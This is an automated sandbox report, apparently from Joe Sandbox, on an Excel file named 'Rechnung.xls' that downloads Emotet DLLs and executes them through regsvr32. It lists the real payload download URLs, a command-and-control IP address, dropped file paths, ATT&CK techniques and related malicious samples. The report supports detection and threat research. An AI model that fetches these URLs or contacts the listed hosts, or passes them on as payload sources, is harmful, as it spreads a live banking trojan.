                      Source: Yara matchFile source: 00000007.00000002.953780664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.943507589.00000000002F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1240660919.00000000002E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1241141714.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts2
                      Scripting                      		Path Interception111
                      Process Injection                      		131
                      Masquerading                      		OS Credential Dumping1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		Exfiltration Over Other Network Medium11
                      Encrypted Channel                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts2
                      Native API                      		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                      Disable or Modify Tools                      		LSASS Memory1
                      Query Registry                      		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                      Non-Standard Port                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts43
                      Exploitation for Client Execution                      		Logon Script (Windows)Logon Script (Windows)1
                      Virtualization/Sandbox Evasion                      		Security Account Manager121
                      Security Software Discovery                      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration15
                      Ingress Tool Transfer                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                      Process Injection                      		NTDS1
                      Virtualization/Sandbox Evasion                      		Distributed Component Object ModelInput CaptureScheduled Transfer3
                      Non-Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA Secrets2
                      Process Discovery                      		SSHKeyloggingData Transfer Size Limits24
                      Application Layer Protocol                      		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common2
                      Scripting                      		Cached Domain Credentials1
                      Remote System Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Hidden Files and Directories                      		DCSync2
                      File and Directory Discovery                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job2
                      Obfuscated Files or Information                      		Proc Filesystem16
                      System Information Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                      Regsvr32                      		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 632078 Sample: Rechnung.xls Startdate: 23/05/2022 Architecture: WINDOWS Score: 100 52 Multi AV Scanner detection for domain / URL 2->52 54 Antivirus detection for URL or domain 2->54 56 Multi AV Scanner detection for dropped file 2->56 58 10 other signatures 2->58 7 EXCEL.EXE 7 25 2->7         started        process3 dnsIp4 44 salledemode.com 160.153.40.1, 49173, 80 AS-26496-GO-DADDY-COM-LLCUS United States 7->44 46 kabeonet.pl 193.143.77.34, 49175, 49176, 80 KEIPL Poland 7->46 48 3 other IPs or domains 7->48 30 C:\Users\user\uxevr3.ocx, PE32+ 7->30 dropped 32 C:\Users\user\uxevr2.ocx, PE32+ 7->32 dropped 34 C:\Users\user\uxevr1.ocx, PE32+ 7->34 dropped 36 4 other malicious files 7->36 dropped 62 Document exploit detected (creates forbidden files) 7->62 64 Document exploit detected (UrlDownloadToFile) 7->64 12 regsvr32.exe 2 7->12         started        16 regsvr32.exe 2 7->16         started        18 regsvr32.exe 2 7->18         started        20 regsvr32.exe 7->20         started        file5 signatures6 process7 file8 38 C:\Windows\System32\...\oAaDhgd.dll (copy), PE32+ 12->38 dropped 66 Hides that the sample has been downloaded from the Internet (zone.identifier) 12->66 22 regsvr32.exe 12->22         started        40 C:\Windows\System32\...\pSYwk.dll (copy), PE32+ 16->40 dropped 25 regsvr32.exe 2 16->25         started        42 C:\Windows\...\hgVDSaDXChbCzdU.dll (copy), PE32+ 18->42 dropped 28 regsvr32.exe 18->28         started        signatures9 process10 dnsIp11 60 System process connects to network (likely due to code injection or exploit) 22->60 50 173.82.82.196, 49177, 49179, 49180 MULTA-ASN1US United States 25->50 signatures12

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Rechnung.xls42%VirustotalBrowse
                      Rechnung.xls34%ReversingLabsDocument-Excel.Trojan.Abracadabra

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dll100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dll100%Joe Sandbox ML
                      C:\Users\user\uxevr3.ocx100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dll100%Joe Sandbox ML
                      C:\Users\user\uxevr1.ocx100%Joe Sandbox ML
                      C:\Users\user\uxevr2.ocx100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dll56%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dll41%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dll29%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dll59%ReversingLabsWin64.Trojan.Emotet

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      SourceDetectionScannerLabelLink
                      kabeonet.pl1%VirustotalBrowse
                      salledemode.com12%VirustotalBrowse
                      vipteck.com10%VirustotalBrowse
                      windowsupdatebg.s.llnwi.net0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://173.82.82.196:8080/100%URL Reputationmalware
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      https://173.82.82.196/C01-100%Avira URL Cloudmalware
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://salledemode.com/tgroup.ge/x4bc2kL4BzGAeUsVi/100%Avira URL Cloudmalware
                      https://173.82.82.196/100%URL Reputationmalware
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      https://vipteck.com/wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/100%Avira URL Cloudmalware
                      http://www.kabeonet.pl/wp-admin/VWlAz5vWJNHDb/100%Avira URL Cloudmalware
                      http://vipteck.com/wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/100%Avira URL Cloudmalware
                      http://kabeonet.pl/wp-admin/VWlAz5vWJNHDb/100%Avira URL Cloudmalware
                      https://173.82.82.196:8080/H100%Avira URL Cloudmalware
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      https://173.82.82.196:8080/L100%Avira URL Cloudmalware
                      https://173.82.82.196/l100%Avira URL Cloudmalware

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      kabeonet.pl
                      		193.143.77.34
                      		truefalseunknown
                      salledemode.com
                      		160.153.40.1
                      		truetrueunknown
                      vipteck.com
                      		188.114.97.10
                      		truefalseunknown
                      airliftlimo.com
                      		159.203.19.2
                      		truefalse
                        		high
                        windowsupdatebg.s.llnwi.net
                        		95.140.236.128
                        		truefalseunknown
                        www.kabeonet.pl
                        		unknown
                        		unknownfalse
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://salledemode.com/tgroup.ge/x4bc2kL4BzGAeUsVi/true
                          • Avira URL Cloud: malware
                          		unknown
                          https://vipteck.com/wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/true
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.kabeonet.pl/wp-admin/VWlAz5vWJNHDb/true
                          • Avira URL Cloud: malware
                          		unknown
                          http://vipteck.com/wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/true
                          • Avira URL Cloud: malware
                          		unknown
                          http://kabeonet.pl/wp-admin/VWlAz5vWJNHDb/true
                          • Avira URL Cloud: malware
                          		unknown
                          https://airliftlimo.com/wp-admin/iMc/false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://173.82.82.196:8080/regsvr32.exe, 00000004.00000003.1001613039.000000000043E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1240840830.000000000043E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1240812626.00000000003CB000.00000004.00000020.00020000.00000000.sdmptrue
                            • URL Reputation: malware
                            		unknown
                            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://173.82.82.196/C01-regsvr32.exe, 00000008.00000002.1240766444.00000000002D7000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://crl.entrust.net/server1.crl0regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://ocsp.entrust.net03regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://173.82.82.196/regsvr32.exe, 00000006.00000002.1240795899.00000000003BD000.00000004.00000020.00020000.00000000.sdmptrue
                              • URL Reputation: malware
                              		unknown
                              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://173.82.82.196:8080/Hregsvr32.exe, 00000008.00000002.1240766444.00000000002D7000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://ocsp.entrust.net0Dregsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://secure.comodo.com/CPS0regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1240826221.00000000003DA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://173.82.82.196:8080/Lregsvr32.exe, 00000008.00000002.1240766444.00000000002D7000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://173.82.82.196/lregsvr32.exe, 00000008.00000002.1240766444.00000000002D7000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  159.203.19.2
                                  		airliftlimo.comUnited States
                                  		14061DIGITALOCEAN-ASNUSfalse
                                  188.114.97.10
                                  		vipteck.comEuropean Union
                                  		13335CLOUDFLARENETUSfalse
                                  173.82.82.196
                                  		unknownUnited States
                                  		35916MULTA-ASN1UStrue
                                  193.143.77.34
                                  		kabeonet.plPoland
                                  		29522KEIPLfalse
                                  160.153.40.1
                                  		salledemode.comUnited States
                                  		26496AS-26496-GO-DADDY-COM-LLCUStrue

                                  General Information

                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                  Analysis ID:632078
                                  Start date and time: 23/05/202209:18:112022-05-23 09:18:11 +02:00
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 9m 1s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Sample file name:Rechnung.xls
                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                  Number of analysed new started processes analysed:13
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.expl.evad.winXLS@15/16@5/5
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HDC Information:
                                  • Successful, ratio: 51.2% (good quality ratio 27.5%)
                                  • Quality average: 32.8%
                                  • Quality standard deviation: 37.5%
                                  HCA Information:
                                  • Successful, ratio: 95%
                                  • Number of executed functions: 47
                                  • Number of non-executed functions: 246
                                  Cookbook Comments:
                                  • Found application associated with file extension: .xls
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                  • Attach to Office via COM
                                  • Scroll down
                                  • Close Viewer

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                  • Excluded IPs from analysis (whitelisted): 173.222.108.210, 173.222.108.226
                                  • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  09:18:30API Interceptor2874x Sleep call for process: regsvr32.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  159.203.19.2melimar.com.xlsGet hashmaliciousBrowse
                                    AGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                      SecuriteInfo.com.XLM.Trojan.Abracadabra.42.Gen.2143.xlsGet hashmaliciousBrowse
                                        188.114.97.10melimar.com.xlsGet hashmaliciousBrowse
                                        • vipteck.com/wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/
                                        #U03bd#U03ad#U03b1 #U03c0#U03b1#U03c1#U03b1#U03b3#U03b3#U03b5#U03bb#U03af#U03b1.exeGet hashmaliciousBrowse
                                        • www.caffinoze.com/uevb/?dN6TSf=5jiPs4hh22L&Zbptn=+kZlZtVkmK9mtN4R8ketZDyq6RgIaOfH1OSk9sfvnCuCv2janrsaP1j7b5HSpzHAlDvs
                                        invoicecopy.exeGet hashmaliciousBrowse
                                        • www.edu-onl-univ-net.com/pzja/?3f=zfCf2c616CyfxHguxZZm7DNwPDi8EB3UdjS0lxktw5y2F154ZGH7CQxfIJF4n79GUGC+&bPvxP=r8YPfT
                                        inward remittance.xlsxGet hashmaliciousBrowse
                                        • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                        xijREvMlOW.exeGet hashmaliciousBrowse
                                        • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                        proof of payment.xlsxGet hashmaliciousBrowse
                                        • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                        7KJG9mtgsK.exeGet hashmaliciousBrowse
                                        • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                        F8v1zSYyNE.exeGet hashmaliciousBrowse
                                        • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                        Enquiry 220519.exeGet hashmaliciousBrowse
                                        • www.belty.net/f7sb/?jN6LWTw=o1F6RDn0sBoDYo7h7gqtE434GJkKPSPCeJfVKwSkLQg71EAJ9C+Oj7XoejvxuceK6+Rk&jtU=nPLTHLD
                                        vbc.exeGet hashmaliciousBrowse
                                        • www.bupabii.site/ud5f/?1bsHsx=7nPxyDW8Iva4xf&iHt=ALfx5VHNdhW2uGqFmDqxYgHynhZL+44fq/uNEf/2poi8cDq081MUE8RtgpR85eIUxsfT
                                        RFQ 00078569_pdf.exeGet hashmaliciousBrowse
                                        • lokaxz.xyz/fc/bk/ss.php
                                        Due Payments.xlsxGet hashmaliciousBrowse
                                        • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                        Due Payments.xlsxGet hashmaliciousBrowse
                                        • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                        remittance confirmationpdf.exeGet hashmaliciousBrowse
                                        • lokaxz.xyz/fc/bk/ss.php
                                        http://halocem.org/azV0jAGet hashmaliciousBrowse
                                        • halocem.org/azV0jA
                                        200.xlsxGet hashmaliciousBrowse
                                        • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                        Odeme makbuzu.exeGet hashmaliciousBrowse
                                        • 5gw4d.xyz/PL341/index.php
                                        SWD0004 PO06350.exeGet hashmaliciousBrowse
                                        • www.floristeriascasablanca3.com/tgdh/?nPvXk=ZiOdQcdAFakp3noFfw0s5I3dZIhycVz4J/o2gsVSsyDVIUb2YJIwyoVnHcK0O/pnw9O7EPCsrQ==&aT=kdQ818F
                                        ryXm1NUc26.exeGet hashmaliciousBrowse
                                        • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                        xbgyAUmAXn.exeGet hashmaliciousBrowse
                                        • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        airliftlimo.commelimar.com.xlsGet hashmaliciousBrowse
                                        • 159.203.19.2
                                        AGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                        • 159.203.19.2
                                        SecuriteInfo.com.XLM.Trojan.Abracadabra.42.Gen.2143.xlsGet hashmaliciousBrowse
                                        • 159.203.19.2
                                        vipteck.commelimar.com.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        AGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                        • 188.114.96.10
                                        XR-4966 report.xlsmGet hashmaliciousBrowse
                                        • 188.114.97.7
                                        XR-4966 report.xlsmGet hashmaliciousBrowse
                                        • 188.114.96.7
                                        2022-03-01_1429.xlsmGet hashmaliciousBrowse
                                        • 188.114.97.7
                                        New payment details and address update.xlsmGet hashmaliciousBrowse
                                        • 188.114.96.7
                                        New payment details and address update.xlsmGet hashmaliciousBrowse
                                        • 188.114.97.7
                                        GZY-010322 PQEM-010322.xlsmGet hashmaliciousBrowse
                                        • 188.114.96.17
                                        2022-03-01_0918.xlsmGet hashmaliciousBrowse
                                        • 188.114.96.7
                                        3907301615343637.xlsmGet hashmaliciousBrowse
                                        • 188.114.97.7
                                        3907301615343637.xlsmGet hashmaliciousBrowse
                                        • 172.67.142.136
                                        TVN-010322 OWUZ-010322.xlsmGet hashmaliciousBrowse
                                        • 188.114.97.7
                                        Form.xlsmGet hashmaliciousBrowse
                                        • 188.114.97.7
                                        salledemode.commelimar.com.xlsGet hashmaliciousBrowse
                                        • 160.153.40.1
                                        AGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                        • 160.153.40.1
                                        dettagli-1605.xlsGet hashmaliciousBrowse
                                        • 160.153.40.1

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        DIGITALOCEAN-ASNUSDETAILS 25922194612.xlsGet hashmaliciousBrowse
                                        • 165.22.73.229
                                        Swift copy.exeGet hashmaliciousBrowse
                                        • 206.189.39.129
                                        Invoice.docxGet hashmaliciousBrowse
                                        • 198.199.122.148
                                        RechnungsDetails.xlsGet hashmaliciousBrowse
                                        • 128.199.252.32
                                        Rechnungskorrektur.xlsGet hashmaliciousBrowse
                                        • 128.199.252.32
                                        Rechnung 2022.20.05_1440.xlsGet hashmaliciousBrowse
                                        • 128.199.252.32
                                        Swift copy.exeGet hashmaliciousBrowse
                                        • 206.189.39.129
                                        melimar.com.xlsGet hashmaliciousBrowse
                                        • 159.203.19.2
                                        AGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                        • 159.203.19.2
                                        3vYbe1bYFd.dllGet hashmaliciousBrowse
                                        • 165.22.73.229
                                        3vYbe1bYFd.dllGet hashmaliciousBrowse
                                        • 165.22.73.229
                                        meerkat.arm7-20220522-2050Get hashmaliciousBrowse
                                        • 5.101.107.84
                                        nZNmWqwnpr.dllGet hashmaliciousBrowse
                                        • 165.22.73.229
                                        W3XqCWvDWC.dllGet hashmaliciousBrowse
                                        • 165.22.73.229
                                        JtJ50Swtfo.dllGet hashmaliciousBrowse
                                        • 165.22.73.229
                                        nZNmWqwnpr.dllGet hashmaliciousBrowse
                                        • 165.22.73.229
                                        W3XqCWvDWC.dllGet hashmaliciousBrowse
                                        • 165.22.73.229
                                        JtJ50Swtfo.dllGet hashmaliciousBrowse
                                        • 165.22.73.229
                                        VUzZGNPCim.dllGet hashmaliciousBrowse
                                        • 165.22.73.229
                                        ZWc3yi399O.dllGet hashmaliciousBrowse
                                        • 165.22.73.229
                                        CLOUDFLARENETUSxwBgnRX7mc.exeGet hashmaliciousBrowse
                                        • 172.67.135.95
                                        7uvkuUP9Ki.exeGet hashmaliciousBrowse
                                        • 172.67.34.170
                                        854F1E97-5DBB-4A87-A566-33D9012B05E2.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        melimar.com.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        JuBFlRMNEa.exeGet hashmaliciousBrowse
                                        • 172.67.135.95
                                        AGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                        • 188.114.96.10
                                        specyfikacja.xlsxGet hashmaliciousBrowse
                                        • 23.227.38.74
                                        SecuriteInfo.com.Trojan.MSIL.Kryptik.AFET.24264.exeGet hashmaliciousBrowse
                                        • 1.2.3.4
                                        F42E768EAF5BBDE818DFA4A2B00B1BC53D2E8365F646E.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        ZXcGOtlPnA.exeGet hashmaliciousBrowse
                                        • 172.67.188.70
                                        meerkat.arm7-20220522-2050Get hashmaliciousBrowse
                                        • 104.17.134.248
                                        badstuff.ps1Get hashmaliciousBrowse
                                        • 172.67.218.221
                                        #U0645#U0634#U0627#U0647#U062f#U0647_#U0627#U0628#U0644#U0627#U063a#U06cc#U0647.apkGet hashmaliciousBrowse
                                        • 104.21.39.189
                                        REF AMVK22-3480.exeGet hashmaliciousBrowse
                                        • 162.159.129.233
                                        RFQ 61340.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        zkVYp3YMvk.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        https://viewstripo.email/template/69b6c1d6-360b-47af-bbec-994db5af551aGet hashmaliciousBrowse
                                        • 104.18.11.207
                                        WebCompanionInstaller.exeGet hashmaliciousBrowse
                                        • 104.18.87.101
                                        AutoInstall.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        GDtq0zJoVm.exeGet hashmaliciousBrowse
                                        • 162.159.129.233

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        7dcce5b76c8b17472d024758970a406bInvoice.docxGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        RechnungsDetails.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        Rechnungskorrektur.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        Rechnung 2022.20.05_1440.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        melimar.com.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        AGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        report 340.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        info_1.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        Facture_09.02.2022_V2.xlsbGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        Scan 69.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        Address Changed.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        10082376542717622006.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        6691113204648532361.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        E318709655.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        OGgZVa2y3B.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        E282497021.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        E2992512590.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        L1877777548.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        SecuriteInfo.com.Exploit.Siggen3.32399.24702.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2
                                        SecuriteInfo.com.Exploit.Siggen3.32401.11843.xlsGet hashmaliciousBrowse
                                        • 188.114.97.10
                                        • 159.203.19.2

                                        Dropped Files

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
